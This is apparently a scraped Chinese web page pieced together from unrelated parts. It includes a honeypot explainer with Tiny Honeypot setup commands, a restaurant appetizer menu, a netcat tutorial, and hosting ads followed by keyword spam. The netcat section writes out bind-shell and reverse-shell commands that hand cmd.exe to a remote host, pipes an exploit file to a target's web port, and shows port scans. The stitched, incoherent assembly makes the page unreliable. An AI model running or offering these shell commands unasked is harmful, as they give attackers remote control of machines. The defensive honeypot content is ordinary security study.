Honeypotnc如何使用

Honeypot  时间:2021-05-30  阅读:()

'蜜罐系统是何钟系统

蜜罐(Honeypot)是一种在互联网上运行的计算 机系统。

它是专门为吸引并诱骗那些试图非法闯 入他人计算机系统的人(如电脑黑客)而设计的,蜜 罐系统是一个包含漏洞的诱骗系统,它通过模拟 一个或多个易受攻击的主机,给攻击者提供一个 容易攻击的目标。

由于蜜罐并没有向外界提供真 正有价值的服务,因此所有对蜜罐尝试都被视为 可疑的。

蜜罐的另一个用途是拖延攻击者对真正 目标的攻击,让攻击者在蜜罐上浪费时间。

简单 点一说:蜜罐就是诱捕攻击者的一个陷阱。

Honeypot的特点 (1) 它不是一个单一的系统,而是一个网络,是 一种高度相 互作用的Honeypot ,装有多个系统和应用软 件。

(2) 所有放置在 内的系统都是标准 的产品系统, 即真实的系统和应用软件都不是仿效的。

Honeypot分类 可以有多种方法对其进行分类:根据蜜罐 的设计目的不同,可以分为产品型蜜罐和 研究型蜜罐二种;根据蜜罐的工作方式不 同可以分为牺牲型蜜罐和外观型蜜罐二 种。

蜜罐的主要技术 蜜罐的主要技术有网络欺骗,端口重定向,报警,数据控制 和数据捕获等。

1.网络欺骗技术: 为了使蜜罐对入侵者更有吸引力,就要采用各种欺骗手段。

例如在欺骗主机上模拟一些操作系统一些网络攻击者最"喜 欢"的端口和各种认为有入侵可能的漏洞。

2.端口重定向技术: 端口重定向技术,可以在工作系统中模拟一个非工作服务。

例如我们正常使用WEB服务(80),而用TELNET(23)和FTP (21)重定向到蜜罐系统中,而实际上这两个服务是没有开 启的,而攻击者扫描时则发现这两个端口是开放的,而实际 上两个端口是HONEYPOT虚拟出来的,对其服务器而不产生危 害性。

3.攻击(入侵)报警和数据控制 蜜罐系统本身就可以模拟成一个操作系统,我们可以把其 本身设定成为易攻破的一台主机,也就是开放一些端口和 弱口令之类的,并设定出相应的回应程序,如在LINUX中的 SHELL,和FTP程序,当攻击者"入侵"进入系统(这里所 指是HONEYPOT虚拟出来的系统)后,当进入后就相当于攻 击者进入一个设定"陷阱",那么攻击者所做一切都在其 监视之中:如TELNET密码暴力破解,添加新用户,权限提升, 删除添加文件,还可以给入侵者一个网络连接让其可以进 行网络传输,并可以作为跳板 4.数据的捕获技术 在攻击者入侵的同时,蜜罐系统将记录攻击者输入输出信 息,键盘记录信息,屏幕信息,以及攻击者曾使用过的工 具,并分析攻击者所要进行的下一步。

捕获的数据不能放 在加有HONEYPOT的主机上,因为有可能被攻击者发现,从 而使其觉察到这是一个"陷阱"而提早退出 典型的Sebek部署。

客户端模块安装在蜜罐(蓝 色)里,蜜罐里攻击者行为被捕获后发送到网络 (对攻击者是不可见的)并且由Honey wall网关被 动的收集。

Tiny Honeypot介绍 Tiny Honeypot 是由e Bakos最初编写,Tiny Honeypot最出色的一点就是系 统容易受到攻击,不用担心电脑黑客和电脑高手们不能入侵,一般会成功的,Tiny Honeypot具有很好的收集那些坏家伙(入侵者) 入侵的信息和信息保存机制。

Tiny Honeypot安装: 首先要下载thp-0.4.6.tar.gz程序然后执行下列命令: cd /usr/local #切换目录到/usr/local zcat thp-0.4.6.tar.gz | tar -xvf - #解压gz文件 ln -s thp-0.4.6.tar.gz thp #建立软链接 mkdir /var/log/hpot #新建目录 chown nobody:nobody /var/log/hpot #设定目录权限 chmod 700 /var/log/hpot #修改查看日志权限 cp ./thp/d.d/* /etc/d.d edit d files to change to :"disable = no" #修改参数(后面详解) #make any path & preferences adjustements in thp.conf & iptables.rules ./thp/iptables.rules #修改规则 /etc/rc.d/init.d/portmap start #启动portmap pmap_set < ./thp/fakerpc /etc/rc.d/init.d/d start #启动d 配置过程: 1 .建议在ROOT用户上进行安装,"chmod 700 /var/log/hpot"修改 访问日志的权限,使只有ROOT才能对其进行访问 2.edit d files to change to :"disable = no" 3../thp/iptables.rules 编译iptables.rules访问规则,注意修改其 ip_forward环境变量为"". 0 4.对honeypot进行网络配置 对 Honeypot进行网络及环境变量配置,如IP地址, 允许正常使用的端口,Honeypot重定向的端口以久虚拟的 网络服务,如正常使用80端口进行WWW服务,21,23端口 进行虚拟,Honeypot可以虚拟出许多的服务,如FTP服 务,WWW服务,远程SHELL,SMTP服务等,在这里就不 一一细说了。

配置实例

Appetizers是什么意思?

头盘餐前小品Appetizers 1.各式刺身拼Sashimi Platter 2.锅贴Pot Sticker 3.辣汁脆炸鸡腿Fried Chicken Legs (Spicy Hot) 4.鸡沙律Chicken Salad 5.酥炸大虾Fried Prawns 6.酥炸生豪Fried Oysters 7.酥炸鲜鱿Fried Squid 8.海哲分蹄Smoked Jelly Fish 9.五香牛展Special Beef 10.白云凤爪Chicken Leg 11.琥珀合桃House Special Honey Walnuts 12.脆皮春卷Spring Rolls 13.蜜汁叉烧B.B.Q. Pork

nc如何使用

一、基本使用 想要连接到某处: nc [-options] hostname port[s] [ports] … 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 G num source-routing pointer: 4, 8, 12, … -I secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -t 以的形式应答 -u UDP模式 -v 详细输出——用多个-v可得到更详细的内容 -z 将输入输出关掉——用于扫描时 -w secs timeout的时间 二. 它的简单使用方法 1.nc -l -p 80 监听80端口 2.nc -l -p 80 >c:log.dat 监听80端口,并把信息记录到log.dat 3.nc -v -l -p 80 监听80端口,并显示端口信息 4.nc -l -p 80 -t -e cmd.exe 监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以的形式应答 5.nc -v ip port 扫描某ip的某个端口 6.nc -v -z ip port-port 扫描某ip的某端口到某端口 7.nc -v -z -u ip port-port 扫描某ip的某udp端口到某udp端口 7.扫描远程主机 nc -nvv -w2 -z 192.168.x.x 80-445 扫描192.168.x.x的TCP 80到TCP445的所有端口 8.REMOTE主机绑定SHELL nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 9.REMOTE主机绑定SHELL并反向连接 nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 三.使用的例子 1. 计算机192.168.0.1运行:nc -v -n -p 99 计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99 这样我们就获得了192.168.0.8的一个shell 2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99 计算机192.168.0.8运行:nc -v -l -p 99 >d:sc.exe 四.高级用法: 1.作攻击程序用 格式1:type c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt 连接到192.168.x.x的80端口,并在其管道中发送’c:exploit.txt’的内容(两种格式确有相同的效果, 真是有异曲同工之妙) 2.作蜜罐用 nc -L -p 80 > c:log.txt 使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:log.txt’中,如果把’>’ 改为’>>’即可以追加日志 3.作蜜罐用 nc -L -p 80 < c:honeypot.txt 使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,并把’c:honeypot.txt’的内容’送’入其 管道中

华纳云-618大促3折起,18元/月买CN2 GIA 2M 香港云,物理机高防同享,10M带宽独享三网直连,无限流量!

官方网站:点击访问华纳云活动官网活动方案:一、香港云服务器此次推出八种配置的香港云服务器,满足不同行业不同业务规模的客户需求,同时每种配置的云服务都有不同的带宽选择,灵活性更高,可用性更强,性价比更优质。配置带宽月付6折季付5.5折半年付5折年付4.5折2年付4折3年付3折购买1H1G2M/99180324576648直达购买5M/17331556710081134直达购买2H2G2M892444...

JustHost,最新高性价比超便宜俄罗斯CN2 VPS云服务器终身8折优惠,最低仅8元/月起,200Mbps带宽不限流量,五大机房自助自由切换,免费更换IP,俄罗斯cn2vps怎么样,justhost云服务器速度及综合性能详细测评报告

主机参考最新消息:JustHost怎么样?JustHost服务器好不好?JustHost好不好?JustHost是一家成立于2006年的俄罗斯服务器提供商,支持支付宝付款,服务器价格便宜,200Mbps大带宽不限流量,支持免费更换5次IP,支持控制面板自由切换机房,目前JustHost有俄罗斯5个机房可以自由切换选择,最重要的还是价格真的特别便宜,最低只需要87卢布/月,约8.5元/月起!just...

星梦云:四川100G高防4H4G10M月付仅60元

星梦云怎么样?星梦云资质齐全,IDC/ISP均有,从星梦云这边租的服务器均可以备案,属于一手资源,高防机柜、大带宽、高防IP业务,一手整C IP段,四川电信,星梦云专注四川高防服务器,成都服务器,雅安服务器。星梦云目前夏日云服务器促销,四川100G高防4H4G10M月付仅60元;西南高防月付特价活动,续费同价,买到就是赚到!点击进入:星梦云官方网站地址1、成都电信年中活动机(成都电信优化线路,封锁...

Honeypot为你推荐
winhttp请问winhttp.dl是什么文件??企业资源管理系统企业管理系统有哪些?知识分享平台关于分享职场技能的知识付费平台,大家有什么好推荐的吗?网络审计网络安全审计系统的背景扫图扫图要怎么修图小四号字word里的小四号字在Photoshop里是指多少点字体?12种颜色油画的基本12种颜色是什么防火墙排名什么防火墙世界第一啊?(急!!!)assemblyinfocsgo很跟cs有什么区别网站建立需要多少钱创立网站要多少钱
厦门域名注册 最新代理服务器地址 免费域名解析 申请免费域名 国外php主机 圣迭戈 ixwebhosting 促正网秒杀 上海域名 刀片服务器是什么 免费活动 台湾google 韩国代理ip 秒杀品 华为云建站 宿迁服务器 apnic 电信主机托管 windowssever2008 zencart安装 更多